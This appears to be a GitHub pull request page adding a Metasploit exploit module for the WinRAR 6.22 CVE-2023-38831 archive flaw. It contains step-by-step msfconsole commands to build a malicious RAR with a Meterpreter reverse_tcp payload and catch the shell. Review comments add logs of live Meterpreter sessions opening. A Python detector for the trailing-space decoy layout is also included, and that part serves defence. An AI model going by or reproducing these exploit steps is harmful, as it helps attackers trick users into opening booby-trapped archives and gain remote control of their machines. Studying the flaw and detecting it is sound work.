
WinRAR 6.22 (CVE-2023-38831) #18341

Merged Sep 7, 2023 (9 commits)

Conversation

@xaitax xaitax commented Sep 4, 2023

Verification

  • Start msfconsole
  • Do: use exploit/windows/fileformat/winrar_cve_2023_38831
  • Do: set PAYLOAD windows/meterpreter/reverse_tcp
  • Do: set LHOST 192.168.100.100
  • Do: set LPORT 1234
  • Do: set INPUT_FILE /tmp/winrar_exploit.pdf
  • Do: exploit

[+] Created /root/.msf4/local/poc.rar

  • Start msfconsole
  • Do: use exploit/multi/handler
  • Do: set PAYLOAD windows/meterpreter/reverse_tcp
  • Do: set LHOST 192.168.100.100
  • Do: set LPORT 1234
  • Do: run

Target:

  • Install WinRAR 6.22 on Windows 10/11
  • Open OUTPUT_FILE
  • Click on INPUT_FILE within archive
  • Enjoy Shell

PoC:
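The verification steps above produce an archive that a target user opens in WinRAR 6.22 and then double-clicks INPUT_FILE inside. For anyone on the defensive side of this, the layout CVE-2023-38831 relies on is visible in the archive's member listing alone: a benign-looking file (for example "report.pdf") next to a directory whose name is the same string plus a trailing space ("report.pdf ") that holds a script. The following is an added example written for this page, not code from the Metasploit module or this PR: a static check over a list of archive member names. The member names in the samples are constructed, the EXEC_EXTS set is our own choice, and for real archives the listing would come from zipfile.ZipFile(...).namelist() in the standard library or, for .rar files, the third-party rarfile package (assumed installed, not used here).

```python
"""Static check for the CVE-2023-38831 archive layout (added example, not the
Metasploit module's code). Works on a plain list of member names so it can be
fed from zipfile, rarfile or a parsed `unrar l` listing alike."""
import posixpath
import zipfile

# File types that Windows will execute when WinRAR hands the "decoy.pdf " path
# to ShellExecute and it resolves to a sibling such as "decoy.pdf .cmd".
# Assumption: this set is ours; extend it to match local policy.
EXEC_EXTS = {".cmd", ".bat", ".exe", ".com", ".scr", ".pif", ".vbs", ".vbe",
             ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1", ".lnk"}


def _normalise(names):
    """Split a member listing into (files, dirs).

    Accepts '/' or '\\' separators and directory entries written with a
    trailing separator. Parent directories that only exist implicitly (the
    archive lists 'a /b.cmd' but no 'a /' entry) are added as well, because
    that is exactly how a hand-crafted archive is likely to look.
    """
    files, dirs = set(), set()
    for raw in names:
        name = raw.replace("\\", "/")
        if name.endswith("/"):
            dirs.add(name.rstrip("/"))
            continue
        files.add(name)
        parent = posixpath.dirname(name)
        while parent:
            dirs.add(parent)
            parent = posixpath.dirname(parent)
    return files, dirs


def find_cve_2023_38831(names):
    """Return sorted (decoy_file, trap_dir, script) tuples.

    A hit is a file entry `decoy`, a directory entry equal to `decoy + ' '`,
    and an executable member inside that directory. Trailing spaces are kept
    verbatim throughout: they are the whole point of the trick.
    """
    files, dirs = _normalise(names)
    hits = []
    for decoy in files:
        trap = decoy + " "
        if trap not in dirs:
            continue
        for member in files:
            if not member.startswith(trap + "/"):
                continue
            ext = posixpath.splitext(member)[1].lower()
            if ext in EXEC_EXTS:
                hits.append((decoy, trap, member))
    return sorted(hits)


def members_from_zip(path):
    """Convenience wrapper for ZIP input (standard library only)."""
    with zipfile.ZipFile(path) as zf:
        return zf.namelist()


# Constructed sample listings (assumption: the real poc.rar produced by the
# module is not shown on this page, so these names are illustrative only).
SAMPLE_MALICIOUS = [
    "winrar_exploit.pdf",
    "winrar_exploit.pdf /",
    "winrar_exploit.pdf /winrar_exploit.pdf .cmd",
]
SAMPLE_BENIGN = ["report.pdf", "images/", "images/logo.png", "notes/readme.txt"]

if __name__ == "__main__":
    for label, listing in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        hits = find_cve_2023_38831(listing)
        print(f"{label}: {'SUSPICIOUS' if hits else 'clean'}")
        for decoy, trap, script in hits:
            print(f"  decoy={decoy!r} trap_dir={trap!r} script={script!r}")
```

The check deliberately flags any executable inside the trap directory rather than only the canonical "decoy.pdf /decoy.pdf .cmd" naming, because the directory-with-trailing-space next to a same-named file is the unusual part; legitimate archives essentially never contain it. Run it over the listing of any .rar or .zip received by mail before a user opens it in an unpatched WinRAR.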

@adfoster-r7 adfoster-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Sep 4, 2023
github-actions bot commented Sep 4, 2023

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

xaitax commented Sep 4, 2023

Linting should be fixed as well, now working with Dir.mktmpdir do |temp_dir|.

@adfoster-r7 adfoster-r7 removed the needs-linting The module needs additional work to pass our automated linting rules label Sep 5, 2023
@bwatters-r7 bwatters-r7 self-assigned this Sep 6, 2023
'Platform' => ['win'],
'Targets' => [['Windows', {}]],
'Payload' => {
'Space' => 4096,
bwatters-r7 commented:

Are we space constrained?

xaitax commented:

Thank you @bwatters-r7. Good point. I don't think so. In the beginning I put it in to be on the safe side, but looking at the research we probably aren't. I can take it out and re-test if you want.

bwatters-r7 commented:

Sure! I downloaded the software and was hoping to get this tested today.

xaitax commented Sep 7, 2023

@bwatters-r7 Confirmed it to be still working with the same options/settings as before but payload space removed. Thanks for the hint.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 46.165.244.xxx:1234
[*] Sending stage (175686 bytes) to 178.238.172.xxx
[*] Meterpreter session 1 opened (46.165.244.xxx:1234 -> 178.238.172.xxx:41032) at 2023-09-07 19:58:46 +0200

meterpreter > getuid
Server username: W00T\ah

@bwatters-r7 bwatters-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I realized the way you'd written this created a malformed 64-bit payload, so it crashed when you used a 64-bit payload. These changes will allow the module to properly create and deploy a 64-bit payload and let it autocomplete 64-bit payload names when you go to set them.

@xaitax xaitax requested a review from bwatters-r7 September 7, 2023 20:02
xaitax commented Sep 7, 2023

Much appreciated @bwatters-r7
Works for me on x64 as well now. Sorry for not testing that earlier.

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     46.165.244.xxx   yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 46.165.244.xxx:1234
[*] Sending stage (200774 bytes) to 178.238.172.xxx
[*] Meterpreter session 1 opened (46.165.244.xxx:1234 -> 178.238.172.xxx:49080) at 2023-09-07 22:01:33 +0200

meterpreter > getuid
Server username: W00T\ah

@bwatters-r7
No problem, @xaitax. Everything looks great.

@bwatters-r7 bwatters-r7 merged commit 946794c into rapid7:master Sep 7, 2023
32 checks passed
@bwatters-r7
Release Notes

This PR adds a module covering CVE-2023-38831, a fileformat vulnerability affecting WinRAR 6.22.

@bwatters-r7 bwatters-r7 added rn-modules release notes for new or majorly enhanced modules docs labels Sep 7, 2023